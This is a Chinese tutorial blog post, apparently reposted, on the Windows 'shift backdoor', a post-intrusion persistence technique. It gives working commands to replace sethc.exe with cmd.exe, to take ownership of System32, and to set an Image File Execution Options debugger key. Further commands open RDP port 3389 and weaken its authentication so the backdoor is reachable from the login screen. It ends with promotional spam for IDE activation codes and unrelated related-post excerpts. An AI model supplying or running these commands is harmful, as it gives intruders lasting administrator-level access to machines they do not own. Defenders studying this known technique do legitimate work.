shift键粘滞了怎么办_5shift后门清免疫

shift键粘滞了怎么办_5shift后门清免疫1.简介沾滞键的目的是为了帮助那些按键有困难的人设计的

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

目录

 

1. 简介

2. 后门原理

3. 后门制作

3.1 方法一 cmd覆盖sethc

3.2 方法二 利用注册表修改沾滞键快捷方式

4. shift后门利用


1. 简介

沾滞键的目的是为了帮助那些按键有困难的人设计的,在Windows系统下连续按5次shift键后,系统就会执行system32下的sethc.exe,也就是启用了沾滞键。了解该方法的目的在于在完成渗透后能留下后门让攻击者一直拥有主机的管理员权限。

2. 后门原理

在C盘C:\Windows\System32目录下存在sethc.exe文件,正常情况下会执行sethc.exe文件,但是当我们将cmd.exe文件把sethc.exe文件通过更改名称给覆盖掉,当我们连续按下5次shift后执行的就是“cmd.exe”文件了。

shift键粘滞了怎么办_5shift后门清免疫

3. 后门制作

3.1 方法一 cmd覆盖sethc

copy C:\WINDOWS\system32\cmd.exe​ C:\windows\system32\sethc.exe   //如果没指定生成的文件,会直接覆盖copy的第二个参数,相当于将第二个参数换成了第一个参数,但是文件外部名称没变

在cmd窗口,输入上面的命令可能出现拒绝访问。

shift键粘滞了怎么办_5shift后门清免疫

出现上述情况需要将目录下的所有目录和文件、子目录下的所有者更改为管理员组(administrators)命令,

takeown  /f  c:\windows\system32\*.*  /a  /r  /d  y  # 获取整个文件夹及其下面子目录文件的所属权

cacls c:\windows\system32\*.* /T /E /G administrators:F # 将所有c:\windows\system32\目录下的文件、子文件夹的NTFS权限修改为仅管理员组(administrators)完全控制(删除原有NTFS权限设置)

shift键粘滞了怎么办_5shift后门清免疫

注销后在登陆界面尝试调用cmd.exe命令行窗口

shift键粘滞了怎么办_5shift后门清免疫

3.2 方法二 利用注册表修改沾滞键快捷方式

使用如下命令

REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”

该操作为添加注册表,引号内的内容为要将注册表项添加到”HKLM\……serhc.exe”

/v 是值名为Debugger 

/t 是类型为REG_SZ

/d 是数据为”C:\……\cmd.exe”

大致意思是在执行sethc.exe的时候会被cmd.exe给替代了

shift键粘滞了怎么办_5shift后门清免疫

结果截图如下: 

shift键粘滞了怎么办_5shift后门清免疫

4. shift后门利用

1.配置防火墙允许远程连接3389端口

netsh advfirewall firewall add rule name=”Remote Desktop” protocol=TCP dir=in localport=3389 action=allow

shift键粘滞了怎么办_5shift后门清免疫

 

2.开启远程桌面

REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyTSConnections /t REG_DWORD /D 0 /f

shift键粘滞了怎么办_5shift后门清免疫

 

3.用户身份验证选项

REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 

* 在最后参数“0”表示在会开启远程登陆验证,可以远程连接到锁屏登陆界面

* 当值为“1”时,使用远程连接工具携带凭证进行验证,不会看到锁屏登陆界面 

shift键粘滞了怎么办_5shift后门清免疫

 

 4.安全层设置

REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t REG_DWORD /d 0

* “0”是连接前使用 rdp 协议进行身份验证,rdp 即远程桌面连接

* “1”是指在连接前两端协商来进行身份验证,默认值也为“1”

* “2”是使用 tls 协议来进行

测试结果: 

shift键粘滞了怎么办_5shift后门清免疫

总结一波:

总的来说该功能利用更多是在后渗透阶段,对于需要登陆主机,或者在web后门获取的shell上不能满足时。

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/192359.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • MATLAB处理图像_matlab视频图像处理

    MATLAB处理图像_matlab视频图像处理RGB图像转为灰度图像:X=rgb2gray(I)

    2022年9月28日
    1
  • AnalyticDB for MySQL:PB级云数仓核心技术和场景解析[通俗易懂]

    AnalyticDB for MySQL:PB级云数仓核心技术和场景解析[通俗易懂]2019阿里云峰会·上海开发者大会于7月24日盛大开幕,本次峰会与未来世界的开发者们分享开源大数据、IT基础设施云化、数据库、云原生、物联网等领域的技术干货,共同探讨前沿科技趋势。本文整理自数据库专场中阿里云智能高级技术专家南仙的精彩演讲,本文为分享了阿里云PB级云数据仓库AnalyticDBforMySQL的核心技术以及其应用场景。数据库专场PPT下载本文内容整理自演讲视频以及PPT…

    2022年9月2日
    3
  • golang 进制转换_java string转integer

    golang 进制转换_java string转integer1-Youmaywriteyourconversionfunction(Fastest):funcString(nint32)string{buf:=[11]byte{}pos:=len(buf)i:=int64(n)signed:=i<0ifsigned{i=-i}for{pos–buf[pos],i=’0’+byt

    2022年9月2日
    0
  • MySQL EXPLAIN执行计划详解

    MySQL EXPLAIN执行计划详解详细介绍了MySQLEXPLAIN执行计划的各个字段的含义以及使用方式。

    2022年10月17日
    0
  • list转json字符串,实体类包含list转实体类「建议收藏」

    list转json字符串,实体类包含list转实体类「建议收藏」StringjsonString=JSON.toJSONString(list);//list转json字符串 List<FanMate>list=JSON.parseArray(jsonString,FanMate.class);//listjson字符串转list StringjsonString=JSON.toJSONString(entity);//list转json字符串 FanMateentity=JSON.parseObject(…

    2022年10月18日
    0
  • 如何证明哈夫曼树是最优二叉树_哈夫曼树完全二叉树

    如何证明哈夫曼树是最优二叉树_哈夫曼树完全二叉树一、定义一些定义:节点之间的路径长度:在树中从一个结点到另一个结点所经历的分支,构成了这两个结点间的路径上的经过的分支数称为它的路径长度树的路径长度:从树的根节点到树中每一结点的路径长度之和。在结点数目相同的二叉树中,完全二叉树的路径长度最短。结点的权:在一些应用中,赋予树中结点的一个有某种意义的实数。结点的带权路径长度:结点到树根之间的路径长度与该结点上权的乘积。树的带权路径长度(Weighte…

    2025年7月5日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号